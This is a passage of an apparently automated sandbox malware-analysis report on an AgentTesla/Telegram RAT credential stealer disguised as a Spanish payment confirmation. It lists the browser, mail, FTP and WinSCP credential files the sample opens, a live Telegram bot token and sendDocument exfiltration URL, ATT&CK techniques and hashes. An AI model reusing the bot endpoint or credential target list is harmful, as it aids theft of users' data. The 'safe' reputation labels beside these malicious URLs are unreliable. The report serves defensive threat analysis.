                      Source: Yara matchFile source: Process Memory Space: Confirmaci#U00f3n de pago_shrunk.exe PID: 3020, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3780, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Confirmaci#U00f3n de pago_shrunk.exe PID: 3020, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3780, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Confirmaci#U00f3n de pago_shrunk.exe PID: 3020, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3780, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.2696679944.000000000313E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2696679944.000000000315A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Confirmaci#U00f3n de pago_shrunk.exe PID: 3020, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3780, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Confirmaci#U00f3n de pago_shrunk.exe PID: 3020, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3780, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		1
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		111
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		11
                      Encrypted Channel                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Software Packing                      		NTDS1
                      Process Discovery                      		Distributed Component Object Model1
                      Input Capture                      		3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Timestomp                      		LSA Secrets141
                      Virtualization/Sandbox Evasion                      		SSHKeylogging4
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading                      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                      Masquerading                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                      Virtualization/Sandbox Evasion                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                      Process Injection                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Confirmaci#U00f3n de pago_shrunk.exe39%ReversingLabsWin32.Trojan.Generic
                      Confirmaci#U00f3n de pago_shrunk.exe100%AviraTR/Dropper.Gen
                      Confirmaci#U00f3n de pago_shrunk.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://account.dyn.com/0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      http://transfer.adttemp.com.br0%Avira URL Cloudsafe
                      https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/0%Avira URL Cloudsafe
                      http://api.telegram.org0%Avira URL Cloudsafe
                      http://transfer.adttemp.com.brd0%Avira URL Cloudsafe
                      https://api.telegram.org0%Avira URL Cloudsafe
                      https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendDocument0%Avira URL Cloudsafe
                      https://transfer.adttemp.com.br/cCoB5/anonymous.txt0%Avira URL Cloudsafe
                      https://transfer.adttemp.com.br0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      transfer.adttemp.com.br
                      		104.196.109.209
                      		truefalse
                        		unknown
                        api.telegram.org
                        		149.154.167.220
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendDocumenttrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://transfer.adttemp.com.br/cCoB5/anonymous.txtfalse
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://transfer.adttemp.com.brConfirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.0000000003003000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://account.dyn.com/Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.orgRegAsm.exe, 00000002.00000002.2696679944.0000000003146000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://transfer.adttemp.com.brdConfirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.0000000003003000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://api.telegram.orgRegAsm.exe, 00000002.00000002.2696679944.000000000315A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameConfirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2696679944.0000000003146000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://transfer.adttemp.com.brConfirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          149.154.167.220
                          		api.telegram.orgUnited Kingdom
                          		62041TELEGRAMRUtrue
                          104.196.109.209
                          		transfer.adttemp.com.brUnited States
                          		15169GOOGLEUSfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1518505
                          Start date and time:2024-09-25 18:50:22 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 2s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:7
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Confirmaci#U00f3n de pago_shrunk.exe
                          renamed because original name is a hash value
                          Original Sample Name:Confirmacin de pago_shrunk.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@3/1@2/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 96%
                          • Number of executed functions: 13
                          • Number of non-executed functions: 3
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: Confirmaci#U00f3n de pago_shrunk.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          12:51:23API Interceptor1x Sleep call for process: Confirmaci#U00f3n de pago_shrunk.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          149.154.167.220SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  AS5AB7c08n.exeGet hashmaliciousMicroClipBrowse
                                    file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                          Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                            test.batGet hashmaliciousMicroClipBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              api.telegram.orgSecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                                              • 149.154.167.220
                                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              AS5AB7c08n.exeGet hashmaliciousMicroClipBrowse
                                              • 149.154.167.220
                                              file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 149.154.167.220
                                              z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 149.154.167.220
                                              test.batGet hashmaliciousMicroClipBrowse
                                              • 149.154.167.220

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              TELEGRAMRUSecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                                              • 149.154.167.220
                                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              AS5AB7c08n.exeGet hashmaliciousMicroClipBrowse
                                              • 149.154.167.220
                                              file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 149.154.167.220
                                              z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 149.154.167.220
                                              test.batGet hashmaliciousMicroClipBrowse
                                              • 149.154.167.220

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 104.196.109.209
                                              • 149.154.167.220
                                              SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                                              • 104.196.109.209
                                              • 149.154.167.220
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 104.196.109.209
                                              • 149.154.167.220
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 104.196.109.209
                                              • 149.154.167.220
                                              https://osoulksa.com/c/FidelitymeGet hashmaliciousHTMLPhisherBrowse
                                              • 104.196.109.209
                                              • 149.154.167.220
                                              http://rkanet.comGet hashmaliciousUnknownBrowse
                                              • 104.196.109.209
                                              • 149.154.167.220
                                              NTGcon.msiGet hashmaliciousUnknownBrowse
                                              • 104.196.109.209
                                              • 149.154.167.220
                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                              • 104.196.109.209
                                              • 149.154.167.220
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 104.196.109.209
                                              • 149.154.167.220
                                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 104.196.109.209
                                              • 149.154.167.220

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Confirmaci#U00f3n de pago_shrunk.exe.log

                                              Download File
                                              Process:C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe
                                              File Type:CSV text
                                              Category:dropped
                                              Size (bytes):847
                                              Entropy (8bit):5.345615485833535
                                              Encrypted:false
                                              SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                              MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                              SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                              SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                              SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                              Malicious:true
                                              Reputation:moderate, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):3.539492620386482
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:Confirmaci#U00f3n de pago_shrunk.exe
                                              File size:208'896 bytes
                                              MD5:5f249a857aa4ec0d7811cbe49b1eac0e
                                              SHA1:9bc2fed4cf1f677c009ba9c0c224e15a07ee8dd4
                                              SHA256:e97a53902ccc623ff61147e3b7cb7e9abf77e8a61a401a317891ffaf73a7338a
                                              SHA512:021890218f651a97b7f2d3a490def666e3a70a55e40355a91ce912eaff80c60728a582128220d8ccc07653d6a131f6bef42892907153b6f25b52ecce22fbfc5c
                                              SSDEEP:1536:SD8LRJrCwGizMmnLU/lmOfsxdPTWQ7ZnbXnD630VD1:SQdJrCwG7Wo/lmOfsxdrWQFXWEVD1
                                              TLSH:FB14E60A36889711C59476F484FB4A6603E76DD22632C2963DF87B8A5E723A3DDC634C
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................................#... ...@....@.. ....................... ............`................................

                                              File Icon

                                              Icon Hash:8f82989919951d01

                                              Static PE Info

                                              General

                                              Entrypoint:0x4123fe
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0xAEC31ED1 [Wed Nov 29 10:49:53 2062 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
